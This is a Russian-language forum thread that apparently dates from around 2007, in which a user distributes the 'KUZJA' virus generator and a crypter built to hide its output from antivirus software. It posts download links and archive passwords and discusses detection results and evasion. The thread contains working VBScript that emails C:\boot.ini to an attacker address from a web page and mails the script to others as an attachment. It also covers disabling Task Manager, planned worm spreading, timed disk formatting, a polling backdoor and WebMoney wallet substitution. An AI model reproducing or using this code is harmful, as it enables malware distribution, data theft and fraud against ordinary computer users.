Недавно создал тему о моем генераторе вирусов, но ее почему-то удалили, я так и не понял почему, решил создать еще раз. Я говорил, что в следующих версиях генератора будет возможность шифрования кода сгенерированного вируса. Я сделал прогу, которая сделана именно под мой генератор, она скрывает сгенерированные вирусы от антивирусов и глаз юзера, код при этом становится абсолютно нечитаемым. У сгенерированного вируса есть несколько недостатков:
1)Юзер может легко запасти, что делает вирус
2)не совсем недостаток, но вирус палит BitDefender.

У кпиптованного вируса все недостатки устранены, код вируса нелегко узнать, но ,конечно, если очень сильно захочется, то можно, но вряд-ли юзеру это надо, на вирустотале все молчит, никто ничего не вякает - это по-моему хорошо

скачать криптор
http://grob-t.narod.ru/KUZJA-CRYPTOR.rar

скачать сам генератор
http://grob-t.narod.ru/kuzja.rar

Пароль на оба архива grob-t.narod.ru

Новая версия генератора - KUZJA 1.1, качать тут:
http://grob-t.narod.ru/Generator_KUZJA_v1.1.rar
пасс grob-t.narod.ru

grob_t
Генератор ты иметь ввиду конструктор вирусов ?
Кстате залей на рапиду.сом если не влом.

залил на рапиду _http://rapidshare.com/files/28264874/Generator_KUZJA_v1.1.rar.html

http://kuzja-generator.ucoz.ru/_ld/0/2_KUZJA-CRYPTOR.rar - новая версия криптора, пароль на архив - 666, с прошлой версией у некоторых были проблеммы, в этой версии есть возможность выбора степени шифрования а так-же выводится диалог выбора файла и не надо его набивать вручную. Криптор написан на VBS, скомпилен прогой EXEScript 3.0

grob_t
На чем писал генератор?

на delphi 9

у меня возникла идея переписать генератор, чтобы он генерил вирусы на VBScript, а не BAT-вирусы, появилось это решение оттого, что после того, как сгенерированные вири начнут палится, криптор сможет их скрывать, но в сгенеренном вирусе тот код, который не может выполнить bat-ник скидывается в vbs-файл, который потом выполняется. Если начнет палиться vbs-файл, то антивири запалят этот файл при запуске виря. Отписывайтесь здесь, одобряете ли вы это решение.

делай коли время есть, а мы потом посмотрим

Поясни что этот генератот делает

Поясни что этот генератот делает
Генерирует вирусы (программы шутки(может и не только шутки)).
Эх и люди пошли...

Переделал генератор под создание vbs вирусов, правда из популярных антивирей палится вебом, но только если включать модуль автозагрузки, но конечно, для вирусов я сделал криптор, после крипта вирь со всеми настройками палится только одним антивирем, но не популярным, чета название забыл) ничего нового в генераторе нету, просто генератор полностью переделан под создание вирей на vbs, возможно где-нибудь могут возникнуть ошибки, если вы их обнаружите отписывайтесь здесь, тут www.kuzja-generator.ucoz.ru в гостевой книге или на форуме либо в асю 444452117 или на мыло grob_t@mail.ru.
скачать генератор KUZJA версии 1.2 - http://kuzja-generator.ucoz.ru/_ld/0/3_Generator_KUZJA.rar

Криптор вирусов - http://kuzja-generator.ucoz.ru/_ld/0/4_KUZJA-CRYPTOR.rar
Пароль на архивы - 666

если найдете ошибки, НЕ забывайте сообщить мне

Такие надписи меня просто убивают ;)
http://s.foto.radikal.ru/0705/e7/86ed927e9167.jpg

ыыы))) не плохо))))ща попробую)

качка нэ идет. даже на сайте регнулся, оттуда тоже нэ идет.

Только что проверил, все качается, залил на рапиду http://rapidshare.com/files/30883736/3_Generator_KUZJA.rar.html - это сам генератор

http://rapidshare.com/files/30884009/4_KUZJA-CRYPTOR.rar.html - это криптор

Пароль на архивы - 666

млин, извини, Flashget переглючило - все качаецца.
молодец +1 супер, ес че напиши как от него избавицца?

Новая версия генератора 1.3a
Качать тут:

http://kuzja-generator.ucoz.ru/_ld/0/5_GeneratorKUZJAv.rar

пасс 666

окуенно молодца работает на пять баллов!!!

GROB_T
Новая сборка be cool))) +1

Занятная вещица..Надо будет протестить. Автору респект.

Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?

Для чего нужено его криптовать, его нужно сначало создать , а потом криптовать и отправлять жертве?
Мда...Криптовать чтобы спрятать от антивирусов и прочих защитных программ...

А можно сделать так чтобы в вирусе использовать функции из двух подменю, например в подменю Сообщени я сделал чтобы окно вылазило например 50 раз, но ведь тот кто скачает и запустит вирус может зайти в процессы и завершить, хоть и в подменю есть функция Запретить диспечер задач, но при создании вируса исользуются функции одного подменю, поэтому прходиться создавать 2 вируса , один с сообщением, другой с Запрешением диспечера задач. И жертва врятли запустит сразу 2 файла.

Только что запустил эту программу с Запрешением диспечера задач, помогите исправить, срочно, комп где запустил не мой, перезагрузка непомогает, что делать?
При нажатии Ctrl+alt+delet наисано диспечер задач отключен администратором.

2 Crash2: в генераторе будет включены все галки которые стоят во всех подменб, т.е. если ты поставишь галку на выводить сообщение и на запрещение диспетчера, все будет работать, вроде просто сначала сработает сообщение, а потом запрет диспетчера, потом поправлю

GROB_T Ок, уже разобрался, а новые версии будут?

С деспечером задач тоже справился, с помощью NexArmAor

Будут новые версии, тока я уже не знаю, что можно в генератор добавить прикольного:) если кто-нить что может посоветовать, пишите тут, могу сделать функции червя с распространением через MS Outlook, тока позние версии не очень любят, когда к ним в адресную книжку кто-то хочет влезть и просят разрешение у юзера :( , вобщем если кто что знает, пишите тут.

Есть код (на VBS) для рассылки через CDO (Collaboration Data Object) , не требует Outlook.

гы один вопрос а как вернуть диспетчер задач?

2 NeXArmAor, покажи, но кажись этот код используется на вкладке уведомление для отсылки письма автору виря

2 barney:
on error resume next
Set S = CreateObject("Wscript.Shell")
s.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\disabletaskmgr","0","REG_DWORD"

это сохрани в vbs файл и запусти

GROB_T
Set SH=CreateObject("wscript.shell")
Set ml = CreateObject("CDO.Message")
Set mlo = CreateObject("CDO.Configuration")
smtps=SH.regread("HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP Server")
mlfrom=SH.regread("HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\00000001\SMTP Email Address")
Set mlc = mlo.Fields
Set ml.Configuration = mlo
mlc("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
mlc("http://schemas.microsoft.com/cdo/configuration/smtpserver") = smtps ' Здесь автоматически определяется SMTP сервер используемый на компьютере
mlc("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 0
mlc.Update
ml.to = "Получатель"
ml.from = mlfrom ' Здесь автоматически определяется от кого письмо,можно подставить другое
ml.subject = "Сабж письма"
ml.AddAttachment (wscript.scriptfullname) ' Аттач
ml.HTMLBody = "ХТМЛ боди или простой текст"
ml.send ' Отправка
SEt mlc = Nothing
SeT mlo = Nothing
SEt ml = Nothing

спс, но этот код по-моему не будет пахать, так как на большинстве серваков нужна авторизация чтоб отправить почту, но возможно на каком нить серваке и будет пахать

а реально ли vbs вставить нв страницу (HTMl, PHP) ?
Кстати надо ещё прогу сделать которая всё назад вернёт.Или скрипт.

helat , В HTML реально,на PHP не знаю. Но скрипт будет работать в таком случае только с IE. Другие браузеры не дружат с VBS.

КАК именно в html опиши плиз.

КАК именно в html опиши плиз.
http://www.compdoc.ru/internet/vbscript/vbscript/1.shtml

helat, <HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
On Error Resume Next
MsgBox "Чтобы посмотреть эту страницу" & vbCrLf & "Включите компонент ActiveX", vbInformation, "Уря"
Set shell=CreateObject("WScript.Shell")
If err.number=429 then
shell.Run javascript:location.reload()
else
--></script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">Бугогагагаа</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>

а файл куда вставить?

<script language = "VBScript">
Тут текст скрипта
</script>

тока кстати, не будет пахать функция wscript.sleep

НЕПАШЕТ
написал
<HTML><BODY>
<script language = "VBScript">
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Set ww = CreateObject("WMPlayer.OCX.7")
Set cw = ww.cdromCollection
if cw.Count >= 1 then
For i = 0 to cw.Count - 1
cw.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "helats@gmail.com", "54027@mail.ru", "ВИРУС", "COPM ZARAZEN")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "54027"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing

</script>
</BODY></HTML>
<HTML><HEAD><TITLE></TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">ГГ</font><BR><font size="1"></font></CENTER></BODY></HTML>

helat,
<HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
On Error Resume Next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Set ww = CreateObject("WMPlayer.OCX.7")
Set cw = ww.cdromCollection
if cw.Count >= 1 then
For i = 0 to cw.Count - 1
cw.Item(i).eject
next
End If
Call SendPost("smtp.mail.ru", "helats@gmail.com", "54027@mail.ru", "ВИРУС", "COPM ZARAZEN")
Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody)
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "54027"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25
Flds.Update
iMsg.Configuration = iConf
iMsg.To = strTo
iMsg.From = strFrom
iMsg.Subject = strSubject
iMsg.TextBody = strBody
iMsg.AddAttachment "c:\boot.ini"
iMsg.Send
End Function
Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
--></script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5">хахахаха...твой комп заражен. Твои пароли ушли ко мне!</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>
Потом сохраняй как любой ХТМЛ файл и запускай.

СЕНК.
А чо он смотриться тока из доверенных?

Кстати как сделать чтоб сиди ром задвигался?

Кстати как сделать чтоб сиди ром задвигался?

То есть задвигался обратно,я так понял. Поставь двойной цикл. Должно сработать

if cw.Count >= 1 then
For i = 0 to cw.Count - 1
For i =1 to 2
cw.Item(i).eject
next
next
End If

cd-rom задвигается той же самой функцией
cw.Item(i).eject
cw.Item(i).eject
вот это сначала выдвинет сидюк, а потом задвинет его

Вы не много не поняли.
Мне надо при первом запкске его выдвинуть.
при втором задвинуть

2 helat ты знаешь букву дисковода или нет?

да

helat , насколько я знаю,средствами VBS можно только открыть дверцу CD-ROM.
Комманды закрытия нет.

на vbs можно закрыть дверцу сидюка, тока для этого надо зарегить библиотеку AutoItX3.dll, скрипт для открытия:
Set oAutoIt = WScript.CreateObject("AutoItX3.Control")
oAutoIt.CDTray "d:", "open"
для закрытия:
Set oAutoIt = WScript.CreateObject("AutoItX3.Control")
oAutoIt.CDTray "d:", "close"

Букву диска заменить на свою

grob_t, и где эта библа?

Непомню где качал, залил на http://grob-t.narod.ru/AutoItX3.dll.rar в архиве файл для реги этой библиотеки

Правильно я сделал? Разместил на Ucoz почему-то не работает?

<HTML><BODY>
<script language = "JavaScript">
<!--
var userAgent=navigator.appName;
var agentInfo=userAgent.substring(0, 1);
if(agentInfo == "M"){
}
else {
alert("Эта страница оптимизирована для работа с браузером Internet Explorer. В другими браузерами возможны ошибки.")
self.close()
}
//-->
</script>
<script language ="vbscript">
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
i=3
while i>0 or i<0
S.popup "Текст сообщения",5, "Заголовок сообщения",0+0
i=i-1
wend
</script></BODY></HTML>
<HTML><HEAD><TITLE>NEX</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><FONT FACE="Arial"><CENTER><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><font size="5"> хахахаха...твой комп заражен. Твои пароли ушли ко мне!</font><BR><font size="1">бугоагаггаа</font></CENTER></BODY></HTML>

Привет всем!

я хочу сказть благодарность GROB_T за проделаную работу!

И хочу сказть что 7 антивирусы обнаружили вирус без криптовки!!!

И 1 антивирус обнаружил с криптовкой- это symantec!!!

Так что дарагой GROB_T ты пожалйста исправь эту проблему ок?

Mosvit
Если я не ошибаюсь юкоз не поддерживает ничего кроме чистого html.

sakauri

А какая разница??? Всеравно пока вирус билдер в паблике он будет палится.
П.С. Криптуй за деньги

sakauri, я хочу сказать, что если исходный код виря будет палиться я не буду его модифицировать, мне намного проще изменить криптор, чтобы вирь перестал палиться, а некриптованный вирь помоему палят тока по модулю автозагрузки, каспер вроде видит как Type_script, а насчет symantec, помоему его практически никто не юзает, но я не совсем понял по чем он палит виря, так как иногда криптованный вирь им палится а иногда на вирустотале все чисто, потом возможно сделаю криптор полиморфным

Все понял ждемс!

Хочу сказть что генератор Каспер определял его только а сейчас уже:
AhnLab-V3 2007.5.24.0 05.25.2007 no virus found
AntiVir 7.4.0.27 05.25.2007 KIT/Zyaku.A
Authentium 4.93.8 05.23.2007 no virus found
Avast 4.7.997.0 05.24.2007 no virus found
AVG 7.5.0.467 05.24.2007 no virus found
BitDefender 7.2 05.25.2007 no virus found
CAT-QuickHeal 9.00 05.24.2007 no virus found
ClamAV devel-20070416 05.25.2007 no virus found
DrWeb 4.33 05.25.2007 no virus found
eSafe 7.0.15.0 05.24.2007 Win32.Zyaku
eTrust-Vet 30.7.3662 05.25.2007 no virus found
Ewido 4.0 05.25.2007 Not-A-Virus.Constructor.Win32.Zyaku
FileAdvisor 1 05.25.2007 No threat detected
Fortinet 2.85.0.0 05.25.2007 W32/Zyaku!kit
F-Prot 4.3.2.48 05.24.2007 no virus found
F-Secure 6.70.13030.0 05.25.2007 Constructor.Win32.Zyaku
Ikarus T3.1.1.8 05.25.2007 Constructor.Win32.Zyaku
Kaspersky 4.0.2.24 05.25.2007 Constructor.Win32.Zyaku
McAfee 5038 05.24.2007 no virus found
Microsoft 1.2503 05.24.2007 no virus found
NOD32v2 2291 05.25.2007 no virus found
Norman 5.80.02 05.24.2007 no virus found
Panda 9.0.0.4 05.25.2007 no virus found
Prevx1 V2 05.25.2007 no virus found
Sophos 4.17.0 05.23.2007 no virus found
Sunbelt 2.2.907.0 05.24.2007 no virus found
Symantec 10 05.25.2007 no virus found
TheHacker 6.1.6.123 05.25.2007 Trojan/Constructor.Zyaku
VBA32 3.12.0 05.25.2007 Constructor.Win32.Zyaku
VirusBuster 4.3.23:9 05.24.2007 no virus found
Webwasher-Gateway 6.0.1 05.25.2007 Tool.Zyaku.A

нады бы исправить это GROB_T

sakauri, а зачем? это же генератор, а не сгенеренный, а генартор 1.2 версии перестал касепером палиться после того как я всего лишь поменял номер версии и больше ничего, тока мне вот интересно, почему Zyaku, а не KUZJA? надо на касперского пожаловаться :)

sakauri, а зачем? это же генератор, а не сгенеренный, а генартор 1.2 версии перестал касепером палиться после того как я всего лишь поменял номер версии и больше ничего, тока мне вот интересно, почему Zyaku, а не KUZJA? надо на касперского пожаловаться :)

Я думаю что Сам касперский и посавил тебе такое назавание а потом другим сказал что бы так сделали!

Дорогой GROB_T обьясника почему твои генераторы и крипторы всегда находятся не там где надо? Тоесть в temp!!!

Незнаю почему у тя генератор находится в temp'е может ты его из архива прямо запускаешь? а криптор написан на Vbs и скомпилен прогой exescript и рабочей папкой я указал temp.

Незнаю почему у тя генератор находится в temp'е может ты его из архива прямо запускаешь? а криптор написан на Vbs и скомпилен прогой exescript и рабочей папкой я указал temp.

Ок все понял!!!

GROB_T а ты бы в билдере сделал бы штобы вирус через какое то время удалялся!
А ты сможешь написать бэкдур на vbs и совмести генератор с ним!

2 sakauri, в генераторе добавлю функции удаления через некоторое время и еще возможность запуска не сразу, а через некоторое время, а вот насчет бэкдура на vbs не думаю, что это хорошая идея, написать то я смогу, но жрать траф будет неслабо и работать будет мягко говоря хреново

GROB_T, ваще мега-респект за билдер vbs скриптов... мне ацки понравился!

А что этот бэкдур нелзя будет как то оптимизировать будет?

Уважаемые у меня появился новй адресс valeev_iscander@yahoo.com
Где первое мая фамилия а второе имя!!!Прошу писать сюда по всем вопросам!!!

2 sakauri, на vbs бэкдур я знаю как сделать тока таким способом:
скрипт постоянно с интервалом, скажем в секунду качает с указанного адреса файлик, в котором содержатся инструкции, которые скрипт выполнит на компе, т.е. этот файл придется заливать вручную и как я уже говорил, будет неслабо траффик жрать, по-обычному бэкдур типа клиент - сервер на vbs вроде сделать нельзя

Ты говоришь вроде ты разузнай поточней ок?

Вообще-то в инете очень мало инфы по vbs, и из всего того что я нарыл нету ни слова про бэкдуры, если кто-то знает как можно такое сделать на vbs, напишите

Grob_t ты чего боишся рассказывать про себя а?
Аты на других языках сможешь сбацыть бэкдур а ?

Grob_t ты чего боишся рассказывать про себя а?
Аты на других языках сможешь сбацыть бэкдур а ?
тебе не кажется бредовым то что он должен чтото про себя рассказывать??
эт раз..
дыва, када научишься писать бекдор по русски, тада и обращайся..
дальше, трои пишутся на заказ за бабло если уж тебе так нужен бекдор.. и буит он написан на перле/дельфи/мб с++... на вбс это немного проблематично сделать..

тебе не кажется бредовым то что он должен чтото про себя рассказывать??
эт раз..
дыва, када научишься писать бекдор по русски, тада и обращайся..
дальше, трои пишутся на заказ за бабло если уж тебе так нужен бекдор.. и буит он написан на перле/дельфи/мб с++... на вбс это немного проблематично сделать..

Вот че ты меня учишь я же тебе предяву не кидаю какую нибудь так и ты мне не кидай ок?

Че вы как дети соретесь из за пустяка)))

Че вы как дети соретесь из за пустяка)))

Правильно подметил нес того взял и кинул мне предяву!

Grob_t ТЫ Красава!! РЕспект Тебе и Уважение!!! )))))

Неплохой генератор ;)

Почему этот вирус до сих пор не палиться антивирусами?

2 Mosvit, незакриптованный вроде палится как type_script, но это тоже зависит от настроек, если закриптовать, то каспер с последними базами не палит, на вирустотал не отправлял

и не отправляйте !!!!!!!!!!!!! если по дольше попользоватся охота !!!!!!!!!!!!

Если вдруг начнет палиться юзайте мой полиморфный криптор Vbs файлов и пишите тут, что палится

GROB_T у меня есть пару идей для тебя:
сделать так чтобы сразу менять иконку файла?
криптор встроенный был тоже?
распространялся по компам?
чтобы мог удалить например мои документы папку и.т.д.?
сделать невидимым при загрузке а ту видно же удалить можно?
так же можно было бы че нибудь переименовать?
да и смог бы сделать так чтобы удалялся через какое то время например дни?

жду ответа GROB_T с уважением vii

1)иконку для vbs файла сменить нельзя, если только поменять значение в реестре

2)а чем отдельно криптор не нравится? если начнут палить криптор, а он будет встроен, придется качать из-за криптора сам генератор, что никому не нужно

3)не оченбь хорошо понял вопрос, как именно распространялся? если имеется ввиду рассылка по всем контактам адр. книги, то это я сделаю

4) это типа как в апокалипсисе? непонимаю зачем это надо но если надо сделаю

5) имеется ввиду msconfig или нет?

6) добавлю

7) это тоже сделаю, и не только чтоб удалялся, добавлю возможность запуска только после определенного дня и т.д.

слушай grob_t а можеш так закалдавать, что бы он автаматически запускался сам ))) через какое то кол-во времени, дней, если его не удолят )))

2 opsik, сделаю чтоб можно было выбирать через сколько времени ему запуститься, но вирь разумеется будет прописываться в автозагрузку и при каждом своем запуске будет делать проверку на количество пройденных дней

2GROB_Tестественно. а сам процес как бы services зашифровать

grob_t
1 ответ понятно!
2 ответ понятно!
3 ответ я мею виду надо бы распростронятся по сети как червь!
4 ответ надо для прикола просто а че нет-то!
5 ответ в загрузке чтобы невидно было а ту удалить можно!да!
6 ответ понятно!
7 ответ понятно!

буду ждать с нетерпением!

2 vii, теперь понятно, все сделаю

а можеш зделать типа антивируса.
Какой все настройки реестра назад вернёт

Антивирь нортон, палит вирус даже после криптора.

$k@no, да я знаю, мне уже кто-то говорил что палит, а если криптовать полиморфным криптором, тоже определяет? просто проверить нортоном можно только если его поставить, онлайн проверки вроде нету

Новая версия генератора 1.4
Добавлены новые функции, теперь генерируются exe вирусы
Генератор переписан с нуля, возможны баги
http://kuzja-generator.ucoz.ru/_ld/0/8_GeneratorKuzja1.rar
пароль: 666

Стаб начал палиться вебом
почищенный стаб: http://kuzja-generator.ucoz.ru/_ld/0/10_stub.rar
пасс:666

Да не плохой генератор, делает вирусы в формате .dat вроде они не чем не палится, автору респект)

Почистил стаб (запалился вебом и каспером)
http://slil.ru/25321187
положить в папку Stub

А проект закрыт уже? Есть связь с автором? Хотел бы на исходники глянуть

Grob_t:
Добавь пожалуйста функцию форматирования дисков в заданое время :). Ток чтобы работала :)))

Grob_t:
Добавь пожалуйста функцию форматирования дисков в заданое время :). Ток чтобы работала :)))
Там кажется есть функция запустить на то или инное время, там поставил галку формат жестокого, потом время запуска например там через 2 дня :)

А почему бы исходники стаба не открыть?!
Каждый для себя компилировал и все, тем более стаб написан на Бейсике, его то я думаю даже ламер разберет

Чего то не ощущаю функции формата =\ Может быть не там исчу?

А почему бы исходники стаба не открыть?!
Каждый для себя компилировал и все, тем более стаб написан на Бейсике, его то я думаю даже ламер разберет
Если исходники не намутишь.. win hex и вперед :D

Если исходники не намутишь.. win hex и вперед :D
Чел, хексом ты америку никому не откроешь, а исходников можно намутить только у автора, поэтому я и предлагаю сделать стаб открытым....

боян .. серьезного виря не напишешь , максимум доунлоудер который не обходит фаеры, кроме виндового + мыльно, шарно , емуль(и подобного) червя... ну и + детские приколы.. =) хотя навредить юзеру можно , заменить удалить и подобное..

2lexa: Так он для этого и нужен, что бы навредить и тд. Тем более не существует и никогда не будет существовать генераторов\конструкторов СЕРЬЕЗЫХ вирей...

Перезалил генератор и стаб
Стаб почищенный

Генератор - http://grts.nm.ru/Kuzja/G_Kuzja_1.4.rar
Стаб - http://grts.nm.ru/Kuzja/stub.rar

Пасс на архивы - 666

2lexa: Так он для этого и нужен, что бы навредить и тд. Тем более не существует и никогда не будет существовать генераторов\конструкторов СЕРЬЕЗЫХ вирей...
bo2k?
чем не конструктор?

1.4 почему-то не работает или я не разобрался, на 1.2 сделал файл, закриптовал, получился файл 123.vbs.crypted.vbs , Symantec палит его и панда палит тоже

В английской винде не меняется имя корзины, пуск итд.

обновленная версия стаба, распаковать в папку с генератором
http://grts.nm.ru/Kuzja/stub.rar
пароль на архив: 666

2grob_t:
МОЖЕТ ТЫ ВСЕЖ ИСХОДНИК СТАБА КИНЕШЬ В ПАБЛИК??

2 asser:
пока что не собираюсь, буду продолжать проект

Генератора нет залей еще раз на рапиду ПЛЗ!

Генератора нет залей еще раз на рапиду ПЛЗ!
_http://rapidshare.com/files/98151315/_________________.rar.html

2grob_t: А первые версии, хотябы самую первую, так поступают с "полуопенсорсными" проектами, что ты теряешь? Я думаю здесь нет малолетних рипперов, которые изменя копирайт и выдадут за свое творение, а даже, если и найдутся - то это будет старая версия...

asser
причина скорей всего не в этом так как копирайти и весь дизайн можно поменять не имея исходников.

gold-goblin
Интересно в чем?! Если проект развивается, то совместными усилиями он будет развиваться бстрее...ИМХО

совместными усилиями
Прости за вопрос: а ты хоть 1 язык программирования знаеш?
(яб тоже исходники не выложил)

Незачто, знаю делфи, а он на делфи как-раз и написан, немного ориентируюсь а асме, но все это на уровне любителя. А вопрос действительно глупый, если бы я не знал языка - я бы не спрашивал про исходники=)

Новая версия генератора - 1.5

http://grts.nm.ru/Kuzja/KUZJA_1.5.rar
пароль на архив - 666

Отлично.. автору уважение за его труды... и зизайн то что нада =)

а что проект КУЗЯ уже не развивается? да и сайт http://grob-t.narod.ru уже не фурычит...

Автору респект!Прога помогла мне освоить Vbs :)

Генератор нормальок.Но зачем к нему какие то крипторы у меня вобще старая версия нодом не палит.

а что проект КУЗЯ уже не развивается? да и сайт http://grob-t.narod.ru уже не фурычит...


сайт его очень давно закрыли . теперь его сайт : http://grts.nm.ru/ . А проект продолжаеться.

Генератор нормальок.Но зачем к нему какие то крипторы у меня вобще старая версия нодом не палит.

можно просто первую строчку вируса с 'This virus created with Kuzja на любую другую и он будет все равно работать. ;)

У меня вопрос по кузе 1.5 :
Что это за функция подмена Wm кошелька? и как она работает?

GrandPa92 генератор подменивает кошыльки на твои и когда юзер будет давать комуто свой кошель штоб бабки перекинуть он даст твой!!

понятно. А сам он будет думаьб что дает свой кошель?